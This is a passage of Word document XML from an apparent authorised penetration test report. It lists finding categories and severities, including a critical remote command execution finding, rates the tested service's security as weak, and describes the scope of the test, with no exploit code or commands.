          <w:p w14:paraId="75A695D7" w14:textId="6F9984D4" w:rsidR="00D74B2A" w:rsidRDefault="00D74B2A" w:rsidP="00D74B2A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CF539E" w14:textId="6F89A6EF" w:rsidR="00D74B2A" w:rsidRDefault="00D74B2A" w:rsidP="00D74B2A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Remote Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36C78747" w14:textId="0ED60AA6" w:rsidR="00D74B2A" w:rsidRDefault="00D74B2A" w:rsidP="00D74B2A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId24" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195190">
              <w:r>
                <w:t>195190</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CD0500"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D6F15" w14:textId="44634477" w:rsidR="00D74B2A" w:rsidRDefault="00D74B2A" w:rsidP="00D74B2A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CD0500"/>
          </w:tcPr>
          <w:p w14:paraId="75BB4C9F" w14:textId="2F4671FB" w:rsidR="00D74B2A" w:rsidRDefault="00D74B2A" w:rsidP="00D74B2A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId25" w:anchor="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>9.9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="5BEFE7AC" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54340A98" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B87581C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="424C23C8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId26" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195172">
              <w:r>
                <w:t>195172</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDC20A"/>
          </w:tcPr>
          <w:p w14:paraId="7E058200" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDC20A"/>
          </w:tcPr>
          <w:p w14:paraId="34592BBE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId27" w:anchor="CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>6.8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="7B9021D1" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D978E8C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration and Deployment Management </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A445B43" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B6E0158" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195165">
              <w:r>
                <w:t>195165</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="163644F1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="3AFF9F54" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="17F437DD" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="636E59FE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7F43E9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C5D04ED" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId29" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195171">
              <w:r>
                <w:t>195171</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="1792FCA6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="7CF32C37" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00745FCE" w14:paraId="53102EC1" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD23C0C" w14:textId="07E0B1B2" w:rsidR="00745FCE" w:rsidRDefault="00745FCE" w:rsidP="00745FCE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F565D5D" w14:textId="520DBFDF" w:rsidR="00745FCE" w:rsidRDefault="00745FCE" w:rsidP="00745FCE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F48C427" w14:textId="7486AF6A" w:rsidR="00745FCE" w:rsidRDefault="00745FCE" w:rsidP="00745FCE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId30" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195199">
              <w:r>
                <w:t>195199</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="1599E051" w14:textId="6E047ACE" w:rsidR="00745FCE" w:rsidRDefault="00745FCE" w:rsidP="00745FCE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="4B3F363A" w14:textId="77777777" w:rsidR="00745FCE" w:rsidRDefault="00745FCE" w:rsidP="00745FCE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="27210BF1" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F0FD2C2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D151C2A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Source Code Dump retrieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DE6603B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId31" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195164">
              <w:r>
                <w:t>195164</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="6A06A3B4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="1BC31C4A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39D3D3D9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E73079F" w14:textId="425FC452" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pen Testing performed on the</w:t>
      </w:r>
      <w:r w:rsidR="0076586C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> service </w:t>
      </w:r>
      <w:r>
        <w:t>for the given scope shows that the</w:t>
      </w:r>
      <w:r w:rsidR="0076586C">
        <w:t xml:space="preserve"> service </w:t>
      </w:r>
      <w:r>
        <w:t>and infrastructure has "</w:t>
      </w:r>
      <w:r w:rsidR="000468CD">
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" risk against attacks and the overall security assessment for the product as tested is classified as </w:t>
      </w:r>
      <w:r w:rsidRPr="000468CD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="000468CD" w:rsidRPr="000468CD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Weak</w:t>
      </w:r>
      <w:r w:rsidRPr="000468CD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF825CB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CEBE13" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc200562829"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0D5EDD4F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The product team authorised the PTC to perform the Pen Test on their Network, Containers/PODs and CLI in the provided Test environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5CE396" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0593BAB3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Pen Test was performed to simulate how a hacker might attack the system to unearth the vulnerabilities and find any security weaknesses in the Network, Containers/PODs and CLI which could lead to exploiting the vulnerabilities to any undesired consequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E2A44" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10581FE3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Pen Test was performed in an ethical hacking manner only, with the intention to find security vulnerabilities and report discovered vulnerabilities to the product owner. This will allow the appropriate remediation prior to the release of the offering, with the goal of minimizing the risk to client using this product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCC0F40" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7271BE2C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">For more details about the strategy used for Pen Test, refer to the section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4D99D2"/>
        </w:rPr>
        <w:t>Testing Methodology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10999978" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following table outlines the overall scope of the penetration testing performed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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70" w:type="dxa"/>
          <w:left w:w="20" w:type="dxa"/>
          <w:bottom w:w="50" w:type="dxa"/>
          <w:right w:w="20" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3133"/>
        <w:gridCol w:w="3133"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="38D48361" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="6FA15141" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="1AB72174" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>In-Scope/ Out-Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="7E8B15E9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remarks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="63585991" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC10444" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46CD9159" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Out of Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="574DEBB5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
